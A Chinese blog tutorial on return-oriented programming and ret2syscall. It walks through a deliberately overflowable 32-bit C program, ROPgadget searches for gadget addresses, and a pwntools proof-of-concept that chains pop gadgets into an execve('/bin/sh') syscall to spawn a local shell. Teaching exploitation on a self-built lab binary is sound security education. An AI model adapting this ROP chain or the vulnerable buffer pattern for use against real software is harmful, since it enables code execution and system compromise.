ropgadgets与ret2syscall技术原理

最新推荐文章于 2024-07-16 21:57:34 发布
最新推荐文章于 2024-07-16 21:57:34 发布
阅读量677 收藏 1
点赞数 1
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41683305/article/details/105725955
版权

程序:

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/syscall.h>
void exploit()
{
system("/bin/sh");
}
void func()
{
char str[0x20];
read(0,str,0x50);
}
int main()
{
func();
return 0;
}

很容易看出func存在溢出

liunx上面的系统调用原理

eax 系统调用号
ebx 第一个参数
ecx 第二个参数
edx 第三个参数
esi 第四个参数
edi 第五个参数
int 0x80

我们利用上面的溢出和根据ropgadgets与ret2syscall技术原理去执行execve("/bin/sh",null,null); ,
所以eax就存放execve函数的系统调用号11,ebx存放第一个参数/bin/sh,ecx存放第二个参数null,就是0,edx存放第三个

eax=11 0xb
ebx="/bin/sh"的地址
ecx=0
edx=0

编译

gcc -no-pie -fno-stack-protector -static -m32 -o 7.exe 7.c
gdb 7.exe
start

static:静态编译,这样有指令流序列
在这里插入图片描述

找到溢出点:
在这里插入图片描述
在这里插入图片描述
在44溢出

利用ropgadget找指令地址

利用溢出把函数execve需要的参数压入栈中,压入栈中之后,这个时候我们就需要找指令地址,利用ret、push、pop这些指令把值赋值到相应的寄存器中

ROPgadget --binary ./7.exe --only "pop|ret" | grep "eax"

找指令流中包含pop和ret的,还必须有eax,我们用:0x080aaa06
在这里插入图片描述

ROPgadget --binary ./7.exe --only "pop|ret" | grep "ebx" | grep "ecx" | grep "edx"

地址:0x0806f711
在这里插入图片描述

ROPgadget --binary ./7.exe --string "/bin/sh"

/bin/sh地址:0x080ae008
在这里插入图片描述

ROPgadget --binary ./7.exe --only "int"|grep "0x80"

int 0x80地址:0x0804a3d2
在这里插入图片描述

poc和解释

from pwn import *
context(arch="i386",os="linux")
p=process('./7.exe')
offset = 44
add_eax=p32(0x080aaa06)
value_eax=p32(0xb)
add_edx_ecx_ebx=p32(0x0806f711)
value_ebx=p32(0x080ae008)
value_ecx=p32(0)
value_edx=p32(0)
add_int=p32(0x0804a3d2)
payload =offset*'\x90'+add_eax+value_eax+add_edx_ecx_ebx+value_edx+value_ecx+value_ebx+add_int
pid=proc.pidof(p)
print pid
pause()
p.sendline(payload)
p.interactive()

解释一下:
溢出44,所以我们用44个0x90填充,add_eax是pop eax ; ret 这段程序的地址, 当执行func函数的ret语句时会,eip为这个地
执行pop eax ; ret 这两条语句,pop eax,此时栈顶值只要时调用execve函数调用号,我们就成功把调用号复制给eax,eax
所以后面加了value_eax 。
执行完pop eax ,栈顶的值是add_edx_ecx_ebx ,也就是下面程序的地址

pop edx ;
pop ecx ;
pop ebx ;
ret

执行ret,我们到这段程序执行,此时栈顶的值是value_edx ,执行pop edx ; ,value_edx到edx中了,后面指令依次类推,执
栈顶的值是: add_int ,也就是int 0x80 的首地址,执行完ret,我们到这里执行,成功调用execve函数

执行poc,成功:
在这里插入图片描述

总结

这个思想大致是在一个程序中,找出我们需要的语句,然后利用溢出,构造数据,把数据打入栈中·,然后利用pop、push、ret语句,将这些数据传入到相应的寄存器,然后让程序去执行这些语句,相当于我们在
一些语句,让程序不按照原来的步骤执行,去执行我们找出来的语句。
这里面关键的技术是保证堆栈平衡,把参数放到指令流需要的地方。这是ropgadgets技术的精髓

p0inter
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ROPgadget题型——ret2syscall
qq_41560595的博客
10-09 651
解题思路 这道题本来考虑使用libc来解,但发现不是动态链接形成的文件。 于是,考虑如下系统调用获取shell: execve("/bin/sh",NULL,NULL) 在32位程序中,参数一般是放在栈中的,但系统调用例外,参数是放在通用寄存器中的。即eax,ebx,ecx,edx。 eax:存放系统调用号,0xb ebx:存放第一个参数/bin/sh地址 ecx:存放第二个参数0 edx:存放第三个参数0 下面就是想办法把几个参数和调用号“弹到”寄存器上: 找到pop edx;pop ecx;pop e
ROP的基本原理和实战教学,看这一篇就够了
QL_2023的博客
02-21 2154
ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。通过上一篇文章栈溢出漏洞原理详解与利用,我们可以发现栈溢出的控制点是ret处,那么ROP的核心思想就是利用以ret结尾的指令序列把栈中的应该返回EIP的地址更改成我们需要的值,从而控制程序的执行流程。
rop_gadgets使用方法
thesum的专栏
05-02 2004
利用mona.py可以生成 !mona rop -m msvcr71.dll -n 这部分gadget能够将后面的shellcode变成可执行的代码段!,后面直接跟shellcode就ok了 rop_gadgets = [     0x7c346c0a,    # POP EAX # RETN (MSVCR71.dll)     0x7c37a140,    # Make EAX
ret2syscall
最新发布
m0_62280492的博客
07-16 725
介绍pwn中32位系统和64位系统下的ret2syscall
ROP-基础-ret2syscall
ATFWUS的博客
02-28 1万+
文件下载地址: 链接:https://pan.baidu.com/s/1HBR7_yuCsP8awm_QNHTdAQ 提取码:uxt8 0x01.checksec Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled ...
pwn学习---ropgadget和ret2syscall
gclome的博客
03-31 1559
ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术,攻击者扫描已有的动态链接库和可执行文件,提取出可以利用的指令片段(gadget),这些指令片段均以ret指令结尾,即用ret指令实现指令片段执行流的衔接,从而构建恶意代码。可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。 ret2syscall,即控制程序执行系...
ROPgadget使用
Jingged的博客
04-09 843
需要注意的是,ROPgadget只是工具的一部分,成功的ROP攻击还需要深入理解目标二进制文件的结构和行为,以及攻击场景的具体细节。此外,随着软件安全性的提高和漏洞修复的不断进行,可用的gadgets可能会变得越来越少,因此在使用ROPgadget时,最好与其他工具和技术结合起来进行更全面的分析和利用开发。ROPgadget是一种基于代码复用技术的攻击工具,它可以帮助攻击者在二进制文件中找到可利用的代码片段(即ROP链中的gadgets),从而构建出有效的攻击载荷。是你想要分析的二进制文件的路径,
高级ROP
m0_49959202的博客
10-01 1307
文章目录高级ROP1.原理1.1 ret2_dl_runtime_resolve1.1.1 _dl_runtime_resolve()函数机制介绍1.1.2 利用思路1.1.2.1 思路 1:直接控制重定位表项的相关内容1.1.2.2 思路 2 - 间接控制重定位表项的相关内容1.1.2.3 思路 3 - 伪造 link_map1.2 SROP1.2.1 signal机制1.2.2 攻击原理1.2.3 相关工具介绍1.3 ret2VDSO1.3.1 概述1.3.2 vdso.so内函数和gadget1.3.
Linux pwn入门教程(3)——ROP技术
xiaoi123的博客
07-10 7576
作者:Tangerine@SAINTSEC原文来自:https://bbs.ichunqiu.com/thread-42530-1-1.html0×00 背景在上一篇教程的《shellcode的变形》一节中,我们提到过内存页的RWX三种属性。显然,如果某一页内存没有可写(W)属性,我们就无法向里面写入代码,如果没有可执行(X)属性,写入到内存页中的shellcode就无法执行。关于这个特性的实验在...
Return-Oriented Programming技术的高级利用策略
Return-Oriented Programming(ROP)是一种利用程序已有代码段(即"gadgets")的编程技术,用于构造恶意代码执行序列。ROP技术最早由Hovav Shacham在2007年提出,并被广泛应用于实现代码注入攻击。 ## 1.2 ROP与...
破解索尼PS4系列:利用网页漏洞实现相关的ROP攻击(一)
weixin_33916256的博客
09-20 2494
本文讲的是破解索尼PS4系列:利用网页漏洞实现相关的ROP攻击(一), 目前关于PS4的黑客攻击还非常的少,但这并不能说明PS4 系统非常安全,黑客不会对其发动攻击。本文的目的就是找出PS4的一系列漏洞,最终来获得PS4的内核执行代码。 PlayStation 4(简称PS4),是索尼电脑娱乐公司(SCE)推出的家用游戏机。是PlayStation游戏...
ROP简单 ret2syscall
weixin_34152820的博客
06-12 238
开启的NX保护 写shellcode 是不可能的,也没有system等函数 存在溢出,算下偏移 变量与bp的距离就等于0x60 这个变量的开栈是根据sp开的 他距离sp0x1c 所以偏移就是 bp-sp-0xc1 画个图吧 ESP|-----------------0x1c----------|变量|----------------------------|EBP| 如果...
栈溢出之rop到syscall
06-06 309
当程序开启了nx,但程序有syscall调用的时候。这时栈溢出的利用就可以通过rop来执行syscall的59号调用execve('/bin/sh',null,null),这是这次alictf一道pwn的心得。 ida配合gdb定位程序漏洞如下: signed __int64 __fastcall sub_40108E(__int64 a1) { signed __int...
缓冲区溢出-基本ROP-ret2syscall
weixin_34138139的博客
04-16 276
本文视频: 如果文字过于枯燥,可观看在线视频:https://edu.51cto.com/sd/16514基础知识: 我们在前面讲的ret2text,ret2shellcode,今天来讲下ret2syscall,也就是调用系统函数来获取shell.这里在讲两个概念:第一:ROP(Return-oriented programming),是一种...
(Pwn)CTF工具 ROPgadget 的安装与使用介绍
热门推荐
半岛铁盒的博客
03-10 1万+
一. 介 绍 使用此工具,您可以在二进制文件中搜索Gadgets,以方便您对ROP的利用。 我们知道x86都是靠栈来传递参数的而x64换了它顺序是rdi, rsi, rdx, rcx, r8, r9,(这里6个寄存器可以被理解为Gadgets)如果多于6个参数才会用栈我们要先知道这个特性. 有的题,里面既没有现成的system也没有/bin/sh字符串,也没有提供libc.so给我们,那么我们要做的就是想办法泄露libc地址,拿到system函数和/bin/sh字符串; 我们就需要获取rdi, rsi,
PWN中的ROPgadget
LL021101的博客
03-27 3314
文章目录 前言 一、什么时候使用ROP,以及怎么使用 二、平衡栈帧 总结 前言 ROPgadget是一种基于代码复用的一种攻击技术。 一、ROP的使用(其中一种) 我们做pwn的时候,一般我们的目标是找到system函数和“/bin/sh”字符串,但是基本上pwn题是不会让你这么简单就解决了,他会隐藏system函数,和/bin/sh字符串,此时我们就要用到ROP方法。 ROPgadget --binary rop --only 'pop|ret' //单引号中间的...
pwn练习1-ret2syscall(ROP-gadget)
m0_51756263的博客
10-07 1626
pwn练习1-ret2syscall(ROP-gadget)
pwn入门(3):缓冲区溢出ROP攻击(ret2syscall+ret2libc)
Bossfrank的博客
04-18 1215
本节通过两个实例ret2tsyscall、ret2libc1,非常详细地为读者介绍基本的ROP攻击过程。对函数的调用、传参、返回的过程以及系统调用过程中对寄存器的赋值进行了详细阐释。
ROPgadgets与ret2syscall技术原理
qq_44119514的博客
04-01 150
微机原理与接口技术:RET返回指令解析
"返回指令RET-微机原理与接口技术-周荷琴第4版ppt课件" 在微机原理中,返回指令RET是程序流程控制中至关重要的一部分。RET指令用于结束子程序或中断服务程序的执行,并将程序的执行权交还给调用者。它的主要功能是...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值